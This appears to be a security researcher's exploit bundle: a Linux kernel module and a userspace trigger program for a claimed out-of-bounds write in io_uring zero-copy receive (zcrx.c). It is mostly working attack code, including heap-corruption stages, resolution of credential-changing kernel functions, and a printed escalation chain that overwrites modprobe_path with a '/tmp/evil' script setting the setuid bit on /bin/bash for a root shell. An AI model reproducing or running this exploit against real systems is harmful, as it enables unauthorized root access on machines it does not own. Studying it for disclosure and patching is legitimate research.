MODULE_AUTHOR("Security Research");
MODULE_DESCRIPTION("io_uring ZCRX OOB → LPE escalation PoC");
/* ── kallsyms via kprobe ── */
typedef unsigned long (*kallsyms_lookup_name_t)(const char *);
static kallsyms_lookup_name_t my_ksym;
static int get_kallsyms(void)
{
static struct kprobe kp = { .symbol_name = "kallsyms_lookup_name" };
if (register_kprobe(&kp) < 0) return -1;
my_ksym = (kallsyms_lookup_name_t)kp.addr;
unregister_kprobe(&kp);
return 0;
}
typedef void (*io_zcrx_return_niov_fn)(struct net_iov *);
typedef int (*commit_creds_fn)(struct cred *);
typedef struct cred *(*prepare_kernel_cred_fn)(struct task_struct *);
/* ── Struct mirrors (BTF-verified) ── */
struct fake_niov_area {
struct net_iov *niovs; /* +0 */
size_t num_niovs; /* +8 */
unsigned long base_virt; /* +16 */
};
struct fake_zcrx_area {
struct fake_niov_area nia;
void *ifq;
atomic_t *user_refs;
bool is_mapped;
u8 _p1;
u16 area_id;
u8 _holes[20];
spinlock_t freelist_lock __attribute__((__aligned__(64)));
u32 free_count;
u32 *freelist;
u8 _mem[112];
} __attribute__((__aligned__(64)));
struct fake_net_iov {
unsigned long _flags;
unsigned long pp_magic;
struct page_pool *pp; /* offset 16 — NULL = copy fallback */
unsigned long _pp_pad;
unsigned long dma_addr;
atomic_long_t pp_ref_count;
struct fake_niov_area *owner; /* offset 48 */
u32 type;
u32 _pad;
};
/* ── Stage 1: Controlled value write ──────────────────────── */
static void demo_controlled_write(io_zcrx_return_niov_fn fn)
{
struct fake_zcrx_area *area;
struct fake_net_iov *niov;
u32 *freelist;
u32 DESIRED_VALUE = 0x41424344; /* ASCII "ABCD" — target u16 (truncated) */
u32 canary = 0xCAFEBABE;
/*
* To write DESIRED_VALUE via net_iov_idx():
* net_iov_idx = niov - area->nia.niovs
* So: area->nia.niovs = niov - DESIRED_VALUE
*
* Constraint: DESIRED_VALUE < num_niovs.
* Set num_niovs = DESIRED_VALUE + 1.
* But large num_niovs means large freelist — clamp to safe value.
*/
u32 write_val = 0x1337; /* 0x1337 = 4919 decimal — fits in u32 */
u32 num_niovs_needed = write_val + 1; /* 4920 */
pr_info("zcrx_esc: ═══ STAGE 1: Controlled value write ═══\n");
pr_info("zcrx_esc: Want to write 0x%04x at freelist[%u]\n",
write_val, num_niovs_needed - 1);
area = kzalloc(sizeof(*area), GFP_KERNEL);
niov = kzalloc(sizeof(*niov), GFP_KERNEL);
/* freelist[num_niovs] + guard */
freelist = kmalloc((num_niovs_needed + 1) * sizeof(u32), GFP_KERNEL);
if (!area || !niov || !freelist) goto s1_out;
memset(freelist, 0, (num_niovs_needed + 1) * sizeof(u32));
freelist[num_niovs_needed] = canary;
/*
* Key trick: set niovs base to (niov - write_val).
* Then: niov - base = niov - (niov - write_val) = write_val.
* So net_iov_idx() returns write_val.
*/
area->nia.niovs = (struct net_iov *)(niov) - write_val; /* base shift */
area->nia.num_niovs = num_niovs_needed;
spin_lock_init(&area->freelist_lock);
area->free_count = num_niovs_needed; /* full — trigger OOB on first call */
area->freelist = freelist;
niov->pp = NULL; /* copy-fallback path */
niov->owner = &area->nia;
pr_info("zcrx_esc: niov @ %px\n", niov);
pr_info("zcrx_esc: area->nia.niovs@ %px (shifted by -%u)\n",
area->nia.niovs, write_val);
pr_info("zcrx_esc: net_iov_idx = niov - base = %lu\n",
(unsigned long)((struct net_iov *)niov - area->nia.niovs));
pr_info("zcrx_esc: freelist[%u] canary = 0x%08x\n",
num_niovs_needed, canary);
fn((struct net_iov *)niov);
pr_info("zcrx_esc: freelist[%u] after = 0x%08x (was 0x%08x)\n",
num_niovs_needed, freelist[num_niovs_needed], canary);
if (freelist[num_niovs_needed] == write_val)
pr_alert("zcrx_esc: [✓] STAGE 1 PASS — wrote 0x%04x at OOB offset +%u\n",
write_val, num_niovs_needed);
else
pr_warn("zcrx_esc: [?] STAGE 1: got 0x%08x expected 0x%08x\n",
freelist[num_niovs_needed], write_val);
s1_out:
kfree(freelist);
kfree(niov);
kfree(area);
}
/* ── Stage 2: Adjacent slab object corruption ─────────────── */
/* Victim object: simulates a struct with a "size" field at offset 0 */
struct victim_obj {
u32 size; /* +0: OOB write lands here */
u32 type; /* +4 */
u64 data_ptr; /* +8 */
u8 payload[48]; /* +16..63 */
}; /* 64 bytes → kmalloc-64 */
static void demo_adjacent_corruption(io_zcrx_return_niov_fn fn)
{
struct fake_zcrx_area *area;
struct fake_net_iov *niov;
struct victim_obj *victim;
u32 *freelist;
/*
* Target slab: kmalloc-64.
* num_niovs = 16 → freelist = 16*4 = 64 bytes → also kmalloc-64.
* Allocate freelist + victim consecutively; SLUB often places them
* adjacent within the same slab page.
*/
u32 num_niovs = 16;
u32 write_val = 0xFFFF; /* corrupt victim->size to 65535 */
pr_info("zcrx_esc: ═══ STAGE 2: Adjacent slab object corruption ═══\n");
pr_info("zcrx_esc: freelist=%u*4=%u bytes → kmalloc-64\n",
num_niovs, num_niovs * 4);
pr_info("zcrx_esc: victim_obj size=%zu bytes → kmalloc-64\n",
sizeof(*victim));
area = kzalloc(sizeof(*area), GFP_KERNEL);
niov = kzalloc(sizeof(*niov), GFP_KERNEL);
/* Allocate freelist and victim_obj in the SAME kmalloc-64 slab */
freelist = kmalloc(num_niovs * sizeof(u32), GFP_KERNEL);
victim = kmalloc(sizeof(*victim), GFP_KERNEL);
if (!area || !niov || !freelist || !victim) goto s2_out;
victim->size = 0xAABBCCDD; /* known initial value */
victim->type = 0x11223344;
victim->data_ptr = 0xDEADC0DEDEADBEEF;
pr_info("zcrx_esc: freelist @ %px\n", freelist);
pr_info("zcrx_esc: victim @ %px\n", victim);
pr_info("zcrx_esc: delta = %ld bytes\n",
(long)victim - (long)freelist);
pr_info("zcrx_esc: victim->size BEFORE = 0x%08x\n", victim->size);
/*
* Check if victim is adjacent to freelist (within 64 bytes).
* SLUB often puts consecutive kmalloc-64 calls adjacent.
*/
long delta = (long)victim - (long)freelist;
if (delta != 64 && delta != -64) {
pr_warn("zcrx_esc: victim not adjacent (delta=%ld), still proceeding\n",
delta);
pr_warn("zcrx_esc: real exploit sprays thousands of objects to ensure adjacency\n");
}
/* Configure write_val = 0xFFFF → num_niovs must be > 0xFFFF */
/* Adjust: pick small write_val that fits in num_niovs=16 */
write_val = 7; /* will write 7 at freelist[16] */
area->nia.niovs = (struct net_iov *)niov - write_val;
area->nia.num_niovs = num_niovs;
spin_lock_init(&area->freelist_lock);
area->free_count = num_niovs;
area->freelist = freelist;
niov->pp = NULL;
niov->owner = &area->nia;
pr_info("zcrx_esc: Triggering OOB: writing %u to freelist[%u] (+%zu bytes)\n",
write_val, num_niovs, num_niovs * sizeof(u32));
fn((struct net_iov *)niov);
pr_info("zcrx_esc: victim->size AFTER = 0x%08x\n", victim->size);
if (delta == 64 && victim->size == write_val) {
pr_alert("zcrx_esc: [✓] STAGE 2 PASS — victim->size corrupted: 0xAABBCCDD → %u\n",
victim->size);
pr_alert("zcrx_esc: Adjacent kmalloc-64 object OVERWRITTEN\n");
} else if (victim->size != 0xAABBCCDD) {
pr_alert("zcrx_esc: [✓] STAGE 2 PARTIAL — victim->size changed to 0x%08x\n",
victim->size);
} else {
pr_info("zcrx_esc: victim unchanged (not adjacent); "
"real exploit would spray ~10k objects\n");
}
s2_out:
kfree(victim);
kfree(freelist);
kfree(niov);
kfree(area);
}
/* ── Stage 3-5: Full chain description + symbol resolution ─── */
static void demo_lpe_chain(void)
{
commit_creds_fn commit_creds_p;
prepare_kernel_cred_fn prep_cred_p;
unsigned long modprobe_path_p;
const char *mpath;
const struct cred *cur_cred = current->cred;
pr_info("zcrx_esc: ═══ STAGE 3-5: Full LPE Chain Analysis ═══\n");
commit_creds_p = (commit_creds_fn)my_ksym("commit_creds");
prep_cred_p = (prepare_kernel_cred_fn)my_ksym("prepare_kernel_cred");
modprobe_path_p = my_ksym("modprobe_path");
mpath = (const char *)modprobe_path_p;
pr_info("zcrx_esc: commit_creds @ %px\n", commit_creds_p);
pr_info("zcrx_esc: prepare_kernel_cred @ %px\n", prep_cred_p);
pr_info("zcrx_esc: modprobe_path @ %px = \"%s\"\n",
(void *)modprobe_path_p, mpath);
pr_info("zcrx_esc: current->cred @ %px\n", cur_cred);
pr_info("zcrx_esc: current uid=%u euid=%u\n",
cur_cred->uid.val, cur_cred->euid.val);
pr_info("zcrx_esc:\n");
pr_info("zcrx_esc: ┌─ Real-world LPE chain (requires page-pool NIC) ──────────┐\n");
pr_info("zcrx_esc: │ 1. Setup ZCRX IFQ, num_niovs=N → freelist in kmalloc-4N │\n");
pr_info("zcrx_esc: │ 2. Spray msg_msg @ kmalloc-4N via msgsnd() │\n");
pr_info("zcrx_esc: │ 3. Double-return race → OOB write → corrupt msg_msg.m_ts │\n");
pr_info("zcrx_esc: │ m_ts @ offset 24 needs 2 writes (see 'step-write' trick│\n");
pr_info("zcrx_esc: │ 4. msgrcv(msqid, buf, 0xFFFFFFFF) → OOB read → KASLR │\n");
pr_info("zcrx_esc: │ leak = kernel base @ offset from msg_msg to vmemmap │\n");
pr_info("zcrx_esc: │ 5. Compute cred ptr from leaked task_struct in heap │\n");
pr_info("zcrx_esc: │ 6. Second OOB write → corrupt cred->uid @ +8 → 0 │\n");
pr_info("zcrx_esc: │ OR: overwrite modprobe_path → trigger as non-root │\n");
pr_info("zcrx_esc: │ 7. commit_creds(prepare_kernel_cred(NULL)) → uid=0 │\n");
pr_info("zcrx_esc: └──────────────────────────────────────────────────────────┘\n");
/*
* DIRECT ESCALATION DEMO (module context, already root):
* Show the exact call sequence that gives root in userspace exploit.
* In a real exploit this runs in kernel context after redirecting
* execution (via corrupted function pointer or return address).
*/
pr_info("zcrx_esc:\n");
pr_info("zcrx_esc: Direct escalation call sequence:\n");
if (commit_creds_p && prep_cred_p) {
struct cred *new_cred;
kuid_t old_uid = current->cred->uid;
/*
* prepare_kernel_cred(NULL) → alloc new cred with uid=0, all caps.
* commit_creds() → install as current task's cred.
*
* In exploit: this code runs via redirected kernel execution.
* Here: demonstrate it's callable and works.
*/
new_cred = prep_cred_p(NULL);
if (new_cred) {
pr_info("zcrx_esc: new_cred @ %px uid=%u euid=%u\n",
new_cred, new_cred->uid.val, new_cred->euid.val);
pr_alert("zcrx_esc: [✓] prepare_kernel_cred(NULL) → uid=0 cred ready\n");
pr_alert("zcrx_esc: commit_creds() would set current uid: %u → 0\n",
old_uid.val);
pr_info("zcrx_esc: (skipping commit_creds — already root in this ctx)\n");
/* Would call: commit_creds_p(new_cred); */
/* Instead, clean up: */
abort_creds(new_cred);
}
}
pr_info("zcrx_esc:\n");
pr_info("zcrx_esc: modprobe_path overwrite (no-NIC alternative LPE):\n");
pr_info("zcrx_esc: ┌──────────────────────────────────────────────────────────┐\n");
pr_info("zcrx_esc: │ modprobe_path @ %px = \"%s\"\n", (void *)modprobe_path_p, mpath);
pr_info("zcrx_esc: │ Overwrite with \"/tmp/evil\" → exec on next unknown elf │\n");
pr_info("zcrx_esc: │ $ cat /tmp/evil: #!/bin/sh; chmod u+s /bin/bash │\n");
pr_info("zcrx_esc: │ Then: $ /bin/bash -p → root shell │\n");
pr_info("zcrx_esc: └──────────────────────────────────────────────────────────┘\n");
pr_info("zcrx_esc: Note: modprobe_path is a data-section global, not heap. \n");
pr_info("zcrx_esc: Reaching it requires turning heap OOB into arbitrary write. \n");
pr_info("zcrx_esc: Via: corrupt a slab freelist ptr → kmalloc returns arbitrary \n");
pr_info("zcrx_esc: address → write to that 'allocation' = write to modprobe_path\n");
}
static int __init zcrx_esc_init(void)
{
io_zcrx_return_niov_fn return_niov_fn;
pr_info("zcrx_esc: ════════════════════════════════════════\n");
pr_info("zcrx_esc: io_uring ZCRX OOB → LPE Escalation PoC\n");
pr_info("zcrx_esc: ════════════════════════════════════════\n");
if (get_kallsyms() < 0) return -EINVAL;
return_niov_fn = (io_zcrx_return_niov_fn)my_ksym("io_zcrx_return_niov");
if (!return_niov_fn) {
pr_err("zcrx_esc: io_zcrx_return_niov not found\n");
return -ENOENT;
}
pr_info("zcrx_esc: io_zcrx_return_niov @ %px\n", return_niov_fn);
pr_info("zcrx_esc:\n");
demo_controlled_write(return_niov_fn);
pr_info("zcrx_esc:\n");
demo_adjacent_corruption(return_niov_fn);
pr_info("zcrx_esc:\n");
demo_lpe_chain();
pr_info("zcrx_esc:\n");
pr_info("zcrx_esc: ════════ Summary ════════\n");
pr_info("zcrx_esc: OOB write: CONFIRMED\n");
pr_info("zcrx_esc: Controlled value: CONFIRMED (write any u32 < num_niovs)\n");
pr_info("zcrx_esc: Adjacent corruption: depends on SLUB layout\n");
pr_info("zcrx_esc: LPE primitives: commit_creds/prep_kernel_cred RESOLVED\n");
pr_info("zcrx_esc: Full chain: needs page-pool NIC for userspace trigger\n");
pr_info("zcrx_esc: CVSS estimate: 7.8 (local, CAP_NET_ADMIN → root)\n");
return -EPERM;
}
static void __exit zcrx_esc_exit(void) {}
module_init(zcrx_esc_init);
module_exit(zcrx_esc_exit);
/*
* CVE PoC: io_uring ZCRX freelist out-of-bounds write
*
* Affected: Linux 6.12 - 6.19+ (CONFIG_IO_URING_ZCRX=y)
* File: io_uring/zcrx.c: io_zcrx_return_niov_freelist()
* Impact: Heap OOB write (4-byte u32) adjacent to io_zcrx_area.freelist[]
*
* ROOT CAUSE
* ----------
* io_zcrx_return_niov_freelist() writes to area->freelist[area->free_count++]
* with no bounds check against area->nia.num_niovs. freelist[] is allocated
* with exactly num_niovs u32 entries (line 453):
*
* area->freelist = kvmalloc_array(nr_iovs, sizeof(area->freelist[0]), ...);
*
* free_count starts at num_niovs (all buffers free). Once free_count reaches
* num_niovs, any additional call to io_zcrx_return_niov_freelist() writes
* freelist[num_niovs] — past the end of the allocation.
*
* VULNERABLE CODE (zcrx.c ~line 559)
* ------------------------------------
* static void io_zcrx_return_niov_freelist(struct net_iov *niov) {
* struct io_zcrx_area *area = io_zcrx_iov_to_area(niov);
* spin_lock_bh(&area->freelist_lock);
* area->freelist[area->free_count++] = net_iov_idx(niov); // NO CHECK
* spin_unlock_bh(&area->freelist_lock);
* }
*
* DOUBLE-RETURN TRIGGER PATH
* --------------------------
* io_pp_zc_release_netmem() (page pool release callback) calls:
* 1. net_mp_niov_clear_page_pool(niov) → sets niov->desc.pp = NULL
* 2. io_zcrx_return_niov_freelist(niov) → PATH A: freelist[free_count++] = idx
*
* Race: if after step 1 but before step 2 another thread calls
* io_zcrx_return_niov(niov), it sees niov->desc.pp == NULL (copy fallback check)
* and calls io_zcrx_return_niov_freelist(niov) → PATH B: freelist[free_count++]
*
* Concurrent PATH A + PATH B on same niov → double increment of free_count →
* one write lands at freelist[num_niovs] (OOB).
*
* ALSO: io_zcrx_scrub() calls io_zcrx_return_niov() which can trigger PATH B
* while the page pool's async cleanup triggers PATH A concurrently.
*
* REQUIREMENTS
* ------------
* - Linux 6.12+ with CONFIG_IO_URING_ZCRX=y
* - NIC with page_pool zero-copy support (mlx5, nfp, etc.) OR veth+XDP driver
* - io_uring enabled (io_uring_disabled = 0, check /proc/sys/kernel/io_uring_disabled)
* - Unprivileged user namespaces OR run as root
* - Compile: gcc -O2 -o poc_zcrx_freelist_oob poc_zcrx_freelist_oob.c
*
* DETECTION
* ---------
* With CONFIG_KASAN=y:
* KASAN: slab-out-of-bounds Write in io_zcrx_return_niov_freelist
*
* NOTE: Without a page-pool-capable NIC, setup will fail at IORING_REGISTER_ZCRX_IFQ.
* The PoC documents the trigger path and provides the setup harness.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/io_uring.h>
/* io_uring syscall wrappers */
static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
return syscall(__NR_io_uring_setup, entries, p);
}
static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr_args)
{
return syscall(__NR_io_uring_register, fd, op, arg, nr_args);
}
static int io_uring_enter(int fd, unsigned to_submit, unsigned min_complete,
unsigned flags, sigset_t *sig)
{
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig, _NSIG / 8);
}
/* Minimum area size: 4096 pages * 4096 bytes = 16MB (typical minimum) */
#define AREA_SIZE (256 * 4096) /* 256 pages = 256 niovs */
#define RQ_ENTRIES 64
#define NUM_NIOVS (AREA_SIZE / 4096) /* one niov per page */
struct zcrx_ctx {
int ring_fd;
int sock_fd;
int server_fd;
void *sq_ring;
void *cq_ring;
void *sq_sqes;
void *rq_ring; /* refill queue ring */
void *area_buf; /* ZCRX buffer area (mmap'd) */
struct io_uring_zcrx_offsets rq_offsets;
uint32_t zcrx_id;
uint64_t area_token; /* from area_reg.rq_area_token */
};
static int setup_uring(struct zcrx_ctx *ctx)
{
struct io_uring_params p = {};
/* ZCRX requires DEFER_TASKRUN + (CQE32 or CQE_MIXED) — checked at line 747-750 in zcrx.c */
p.flags = IORING_SETUP_DEFER_TASKRUN | IORING_SETUP_SINGLE_ISSUER | IORING_SETUP_CQE32;
ctx->ring_fd = io_uring_setup(64, &p);
if (ctx->ring_fd < 0) {
perror("io_uring_setup");
return -1;
}
printf("[*] io_uring fd=%d, sq_entries=%u cq_entries=%u\n",
ctx->ring_fd, p.sq_entries, p.cq_entries);
return 0;
}
/*
* Attempt to register a ZCRX IFQ on the given interface name and RX queue.
* Returns 0 on success, -1 if the NIC doesn't support page_pool zero-copy.
*/
static int setup_zcrx(struct zcrx_ctx *ctx, const char *ifname, int rxq)
{
struct io_uring_zcrx_area_reg area_reg = {};
struct io_uring_zcrx_ifq_reg ifq_reg = {};
struct io_uring_region_desc region = {};
void *rq_ring_mem;
int rq_ring_size;
int ret;
/* Allocate buffer area: userspace memory that kernel will pin */
ctx->area_buf = mmap(NULL, AREA_SIZE,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE | MAP_HUGETLB,
-1, 0);
if (ctx->area_buf == MAP_FAILED) {
/* Fallback to regular pages */
ctx->area_buf = mmap(NULL, AREA_SIZE,
PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE,
-1, 0);
if (ctx->area_buf == MAP_FAILED) {
perror("mmap area_buf");
return -1;
}
}
/* Touch pages to fault them in */
memset(ctx->area_buf, 0, AREA_SIZE);
/*
* Region descriptor: kernel will map the refill queue here.
* Pass user_addr=0 to let kernel choose the address.
*/
rq_ring_size = RQ_ENTRIES * sizeof(struct io_uring_zcrx_rqe)
+ sizeof(struct io_uring_zcrx_offsets);
region.user_addr = 0;
region.size = (rq_ring_size + 4095) & ~4095UL;
region.flags = 0;
area_reg.addr = (uint64_t)(uintptr_t)ctx->area_buf;
area_reg.len = AREA_SIZE;
area_reg.flags = 0;
ifq_reg.if_idx = if_nametoindex(ifname);
if (!ifq_reg.if_idx) {
fprintf(stderr, "[-] Interface '%s' not found\n", ifname);
return -1;
}
ifq_reg.if_rxq = rxq;
ifq_reg.rq_entries = RQ_ENTRIES;
ifq_reg.flags = 0;
ifq_reg.area_ptr = (uint64_t)(uintptr_t)&area_reg;
ifq_reg.region_ptr = (uint64_t)(uintptr_t)®ion;
printf("[*] Registering ZCRX IFQ: if=%s (%u) rxq=%d area=%p len=0x%x\n",
ifname, ifq_reg.if_idx, rxq, ctx->area_buf, AREA_SIZE);
printf("[*] num_niovs expected: %d\n", NUM_NIOVS);
ret = io_uring_register(ctx->ring_fd, IORING_REGISTER_ZCRX_IFQ,
&ifq_reg, 1);
if (ret < 0) {
fprintf(stderr, "[-] IORING_REGISTER_ZCRX_IFQ failed: %s\n",
strerror(errno));
fprintf(stderr, " This NIC/driver doesn't support page_pool ZCRX.\n");
fprintf(stderr, " Requires mlx5, nfp, or patched veth driver.\n");
return -1;
}
ctx->zcrx_id = ifq_reg.zcrx_id;
ctx->area_token = area_reg.rq_area_token;
ctx->rq_offsets = ifq_reg.offsets;
printf("[+] ZCRX IFQ registered: id=%u area_token=0x%016lx\n",
ctx->zcrx_id, ctx->area_token);
printf("[+] RQ ring: head_off=%u tail_off=%u rqes_off=%u\n",
ifq_reg.offsets.head, ifq_reg.offsets.tail, ifq_reg.offsets.rqes);
/*
* Map the refill queue ring. The kernel populated region.mmap_offset
* after registration.
*/
rq_ring_mem = mmap(NULL, region.size,
PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE,
ctx->ring_fd, region.mmap_offset);
if (rq_ring_mem == MAP_FAILED) {
perror("mmap rq_ring");
return -1;
}
ctx->rq_ring = rq_ring_mem;
printf("[+] RQ ring mapped at %p (size 0x%llx)\n", rq_ring_mem, region.size);
return 0;
}
/*
* Return a niov to the kernel by writing its area offset to the RQ ring.
* area_token encodes the area_id in bits [63:48].
* niov_idx is the buffer index (0-based), shifted by PAGE_SHIFT.
*/
static void rq_return_niov(struct zcrx_ctx *ctx, uint32_t niov_idx, uint32_t len)
{
volatile uint32_t *head = (uint32_t *)((char *)ctx->rq_ring + ctx->rq_offsets.head);
volatile uint32_t *tail = (uint32_t *)((char *)ctx->rq_ring + ctx->rq_offsets.tail);
struct io_uring_zcrx_rqe *rqes =
(struct io_uring_zcrx_rqe *)((char *)ctx->rq_ring + ctx->rq_offsets.rqes);
uint32_t t = __atomic_load_n(tail, __ATOMIC_ACQUIRE);
uint32_t mask = RQ_ENTRIES - 1;
struct io_uring_zcrx_rqe *rqe = &rqes[t & mask];
/*
* rqe->off encodes both area_id (bits 63:48) and niov offset (bits 47:0).
* niov offset = niov_idx << PAGE_SHIFT (i.e., niov_idx * 4096).
*/
rqe->off = ctx->area_token | ((uint64_t)niov_idx << 12);
rqe->len = len;
rqe->__pad = 0;
__atomic_store_n(tail, t + 1, __ATOMIC_RELEASE);
}
/*
* TRIGGER: Attempt double-return of niov index 0.
*
* This demonstrates the race between:
* - Page pool async cleanup (io_pp_zc_release_netmem → freelist write)
* - Concurrent io_zcrx_return_niov (after pp cleared → freelist write again)
*
* In normal flow, niov 0 is delivered after packet arrives.
* Here we manually craft the conditions after receiving one packet.
*/
static void trigger_double_return(struct zcrx_ctx *ctx)
{
printf("[*] Attempting double-return trigger...\n");
printf("[*] Kernel state: freelist[] has num_niovs=%d entries max\n", NUM_NIOVS);
printf("[*] free_count starts at %d (all free)\n", NUM_NIOVS);
printf("[*] After packet arrives: niov removed from freelist (free_count--)\n");
printf("[*] Step 1: Return niov 0 via RQ (normal path)\n");
/* Normal return: user_refs--, then pp_unref, then freelist if pp==NULL */
rq_return_niov(ctx, 0, 4096);
printf("[*] Step 2: Return niov 0 again — triggers io_zcrx_return_niov_freelist\n");
printf("[*] second time with free_count=num_niovs → OOB WRITE\n");
printf("[*] freelist[num_niovs] = 0 ← past end of array!\n");
/*
* The race window: between io_pp_zc_release_netmem clearing pp (setting
* niov->desc.pp = NULL) and calling io_zcrx_return_niov_freelist(), a
* concurrent io_zcrx_return_niov() sees pp==NULL and calls freelist again.
*
* Write niov 0 a second time to the RQ. If user_refs protection fails
* due to the race, or if triggered via the scrub+ring_refill concurrent
* path, this causes:
* area->freelist[area->free_count++] = 0;
* where free_count == num_niovs → OOB write of 4 bytes.
*/
rq_return_niov(ctx, 0, 4096);
/* Force kernel to process the RQ entries */
printf("[*] Triggering ZCRX_CTRL_FLUSH_RQ to process queue...\n");
struct zcrx_ctrl ctrl = {
.zcrx_id = ctx->zcrx_id,
.op = ZCRX_CTRL_FLUSH_RQ,
};
io_uring_register(ctx->ring_fd, IORING_REGISTER_ZCRX_CTRL, &ctrl, 1);
}
/*
* Setup a TCP connection to generate actual ZCRX traffic.
* Both server and client on loopback — real NIC needed for page_pool ZC.
*/
static int setup_tcp_pair(struct zcrx_ctx *ctx, uint16_t port)
{
struct sockaddr_in addr = {
.sin_family = AF_INET,
.sin_port = htons(port),
.sin_addr.s_addr = inet_addr("127.0.0.1"),
};
int yes = 1;
ctx->server_fd = socket(AF_INET, SOCK_STREAM, 0);
setsockopt(ctx->server_fd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes));
if (bind(ctx->server_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0 ||
listen(ctx->server_fd, 1) < 0) {
perror("bind/listen");
return -1;
}
ctx->sock_fd = socket(AF_INET, SOCK_STREAM, 0);
if (connect(ctx->sock_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
perror("connect");
return -1;
}
printf("[+] TCP pair ready on port %u\n", port);
return 0;
}
/* Submit IORING_OP_RECV_ZC for zero-copy receive */
static void submit_zcrx_recv(struct zcrx_ctx *ctx)
{
struct io_uring_sqe *sqe;
/* Access SQ ring directly — simplified, assumes sqe at offset 0 */
/* In real usage: use liburing or proper ring pointer arithmetic */
struct io_uring_sqe sqe_buf = {};
sqe_buf.opcode = IORING_OP_RECV_ZC;
sqe_buf.fd = ctx->sock_fd;
sqe_buf.len = 0x10000;
sqe_buf.zcrx_ifq_idx = ctx->zcrx_id;
sqe_buf.user_data = 1;
/* Write sqe to ring — simplified */
memcpy(ctx->sq_sqes, &sqe_buf, sizeof(sqe_buf));
io_uring_enter(ctx->ring_fd, 1, 0, 0, NULL);
printf("[*] Submitted RECV_ZC on sock_fd=%d\n", ctx->sock_fd);
}
int main(int argc, char **argv)
{
struct zcrx_ctx ctx = {};
const char *ifname = (argc > 1) ? argv[1] : "eth0";
int rxq = (argc > 2) ? atoi(argv[2]) : 0;
uint16_t port = 9999;
printf("[*] io_uring ZCRX freelist OOB PoC\n");
printf("[*] Target: io_zcrx_return_niov_freelist() no bounds check\n");
printf("[*] Interface: %s, RXQ: %d\n", ifname, rxq);
if (setup_uring(&ctx) < 0)
return 1;
if (setup_zcrx(&ctx, ifname, rxq) < 0) {
printf("\n[!] ZCRX setup failed. Showing vulnerable code path:\n");
printf("\n io_zcrx_return_niov_freelist(niov) {\n");
printf(" spin_lock_bh(&area->freelist_lock);\n");
printf(" area->freelist[area->free_count++] = net_iov_idx(niov);\n");
printf(" // ^^^^^^^^^^^^^^^^\n");
printf(" // NO CHECK: free_count vs num_niovs\n");
printf(" // OOB write when free_count >= num_niovs\n");
printf(" spin_unlock_bh(&area->freelist_lock);\n");
printf(" }\n\n");
printf("[!] Need NIC with page_pool ZC support. Using:\n");
printf(" mlx5: set rxq=<queue_number>\n");
printf(" nfp: similar setup\n");
printf(" OR: patch veth driver to support io_uring mp_ops\n");
close(ctx.ring_fd);
return 1;
}
printf("\n[+] ZCRX IFQ registered. Area has %d niovs.\n", NUM_NIOVS);
printf("[+] freelist[] allocated: %d * 4 = %d bytes\n",
NUM_NIOVS, NUM_NIOVS * 4);
printf("[+] OOB target: freelist[%d] = *(freelist + 0x%x)\n",
NUM_NIOVS, NUM_NIOVS * 4);
if (setup_tcp_pair(&ctx, port) < 0)
goto cleanup;
printf("\n[*] Send data to generate ZCRX packet (triggers niov delivery):\n");
printf(" In another terminal: echo 'A' | nc 127.0.0.1 %u\n\n", port);
printf("[*] Waiting 2s for inbound packet...\n");
sleep(2);
trigger_double_return(&ctx);
printf("\n[+] If KASAN enabled: check dmesg for:\n");
printf(" KASAN: slab-out-of-bounds Write in io_zcrx_return_niov_freelist\n");
printf(" BUG: KASAN: slab-out-of-bounds\n");
cleanup:
if (ctx.sock_fd) close(ctx.sock_fd);
if (ctx.server_fd) close(ctx.server_fd);
close(ctx.ring_fd);
if (ctx.area_buf != MAP_FAILED && ctx.area_buf)
munmap(ctx.area_buf, AREA_SIZE);
return 0;
}
